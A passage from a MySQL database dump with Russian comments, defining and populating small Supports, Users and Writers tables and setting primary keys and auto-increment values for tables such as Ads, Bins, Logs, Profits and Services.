  `createdAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `updatedAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Дамп данных таблицы `Supports`
--

INSERT INTO `Supports` (`id`, `adId`, `token`, `status`, `createdAt`, `updatedAt`) VALUES
(1, 5001346139, '1648708405688.6714', NULL, '2022-03-31 09:33:25', '2022-03-31 09:33:25'),
(2, 209456379, '1650846827585.8638', NULL, '2022-04-25 03:33:47', '2022-04-25 03:33:47'),
(3, 209456379, '1650846930460.8718', NULL, '2022-04-25 03:35:30', '2022-04-25 03:35:30'),
(4, 209456379, '1650846957399.7192', NULL, '2022-04-25 03:35:57', '2022-04-25 03:35:57'),
(5, 209456379, '1650846989036.076', NULL, '2022-04-25 03:36:29', '2022-04-25 03:36:29'),
(6, 209456379, '1650847039135.8657', NULL, '2022-04-25 03:37:19', '2022-04-25 03:37:19'),
(7, 209456379, '1650847083586.0952', NULL, '2022-04-25 03:38:03', '2022-04-25 03:38:03'),
(8, 209456379, '1650848256428.6116', NULL, '2022-04-25 03:57:36', '2022-04-25 03:57:36'),
(9, 191824682, '1650848689586.1501', NULL, '2022-04-25 04:04:49', '2022-04-25 04:04:49'),
(10, 207816472, '1650849450089.375', NULL, '2022-04-25 04:17:30', '2022-04-25 04:17:30'),
(11, 223398008, '1650849808038.379', NULL, '2022-04-25 04:23:28', '2022-04-25 04:23:28'),
(12, 207816472, '1650850534990.4165', NULL, '2022-04-25 04:35:34', '2022-04-25 04:35:34'),
(13, 191824682, '1650850537706.4302', NULL, '2022-04-25 04:35:37', '2022-04-25 04:35:37'),
(14, 207816472, '1650850706453.6404', NULL, '2022-04-25 04:38:26', '2022-04-25 04:38:26'),
(15, 224902758, '1650850996260.8174', NULL, '2022-04-25 04:43:16', '2022-04-25 04:43:16'),
(16, 224902758, '1650851239288.4348', NULL, '2022-04-25 04:47:19', '2022-04-25 04:47:19'),
(17, 195147204, '1650852885005.7566', NULL, '2022-04-25 05:14:45', '2022-04-25 05:14:45'),
(18, 173318412, '1650856822191.8716', NULL, '2022-04-25 06:20:22', '2022-04-25 06:20:22'),
(19, 215336463, '1650857111646.4524', NULL, '2022-04-25 06:25:11', '2022-04-25 06:25:11'),
(20, 172050447, '1650857136558.0823', NULL, '2022-04-25 06:25:36', '2022-04-25 06:25:36');

-- --------------------------------------------------------

--
-- Структура таблицы `Users`
--

CREATE TABLE `Users` (
  `id` bigint(20) NOT NULL,
  `username` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `status` tinyint(4) NOT NULL DEFAULT '0',
  `banned` tinyint(1) NOT NULL DEFAULT '0',
  `hideNick` tinyint(1) NOT NULL DEFAULT '0',
  `percent` decimal(36,2) DEFAULT NULL,
  `percentType` tinyint(4) DEFAULT NULL,
  `createdAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `updatedAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Дамп данных таблицы `Users`
--

INSERT INTO `Users` (`id`, `username`, `status`, `banned`, `hideNick`, `percent`, `percentType`, `createdAt`, `updatedAt`) VALUES
(2065964199, 'Crystal_TC', 1, 0, 0, NULL, NULL, '2022-04-25 06:21:35', '2022-04-25 06:22:38'),
(2129003057, 'catedevsetup', 1, 0, 0, NULL, NULL, '2022-04-25 05:01:54', '2022-04-25 05:15:18'),
(5379120045, 'Crypto_WebDev', 1, 0, 0, NULL, NULL, '2022-04-25 01:34:40', '2022-04-25 02:15:46');

-- --------------------------------------------------------

--
-- Структура таблицы `Writers`
--

CREATE TABLE `Writers` (
  `id` int(11) NOT NULL,
  `countryCode` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `username` text COLLATE utf8mb4_unicode_ci,
  `createdAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `updatedAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Дамп данных таблицы `Writers`
--

INSERT INTO `Writers` (`id`, `countryCode`, `username`, `createdAt`, `updatedAt`) VALUES
(1, '1', 'Crypto_WebDev', '2022-04-25 01:42:08', '2022-04-25 01:42:08');

--
-- Индексы сохранённых таблиц
--

--
-- Индексы таблицы `Ads`
--
ALTER TABLE `Ads`
  ADD PRIMARY KEY (`id`);

--
-- Индексы таблицы `Bins`
--
ALTER TABLE `Bins`
  ADD PRIMARY KEY (`id`);

--
-- Индексы таблицы `Countries`
--
ALTER TABLE `Countries`
  ADD PRIMARY KEY (`id`);

--
-- Индексы таблицы `Currencies`
--
ALTER TABLE `Currencies`
  ADD PRIMARY KEY (`id`);

--
-- Индексы таблицы `Logs`
--
ALTER TABLE `Logs`
  ADD PRIMARY KEY (`id`);

--
-- Индексы таблицы `Profits`
--
ALTER TABLE `Profits`
  ADD PRIMARY KEY (`id`);

--
-- Индексы таблицы `Requests`
--
ALTER TABLE `Requests`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `userId` (`userId`);

--
-- Индексы таблицы `Sequelizemeta`
--
ALTER TABLE `Sequelizemeta`
  ADD PRIMARY KEY (`name`),
  ADD UNIQUE KEY `name` (`name`);

--
-- Индексы таблицы `Services`
--
ALTER TABLE `Services`
  ADD PRIMARY KEY (`id`);

--
-- Индексы таблицы `Settings`
--
ALTER TABLE `Settings`
  ADD PRIMARY KEY (`id`);

--
-- Индексы таблицы `SupportChats`
--
ALTER TABLE `SupportChats`
  ADD PRIMARY KEY (`id`);

--
-- Индексы таблицы `Supports`
--
ALTER TABLE `Supports`
  ADD PRIMARY KEY (`id`);

--
-- Индексы таблицы `Users`
--
ALTER TABLE `Users`
  ADD PRIMARY KEY (`id`);

--
-- Индексы таблицы `Writers`
--
ALTER TABLE `Writers`
  ADD PRIMARY KEY (`id`);

--
-- AUTO_INCREMENT для сохранённых таблиц
--

--
-- AUTO_INCREMENT для таблицы `Bins`
--
ALTER TABLE `Bins`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT для таблицы `Currencies`
--
ALTER TABLE `Currencies`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=39;

--
-- AUTO_INCREMENT для таблицы `Logs`
--
ALTER TABLE `Logs`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=12;

--
-- AUTO_INCREMENT для таблицы `Profits`
--
ALTER TABLE `Profits`
  MODIFY `id` bigint(20) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT для таблицы `Requests`
--
ALTER TABLE `Requests`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=9;

--
-- AUTO_INCREMENT для таблицы `Services`
--
ALTER TABLE `Services`
  MODIFY `id` bigint(20) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=24;

--
-- AUTO_INCREMENT для таблицы `Settings`
--
ALTER TABLE `Settings`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT для таблицы `SupportChats`
--
ALTER TABLE `SupportChats`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=21;

--
-- AUTO_INCREMENT для таблицы `Supports`
--
ALTER TABLE `Supports`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=21;

--
-- AUTO_INCREMENT для таблицы `Writers`
--
ALTER TABLE `Writers`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;
COMMIT;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
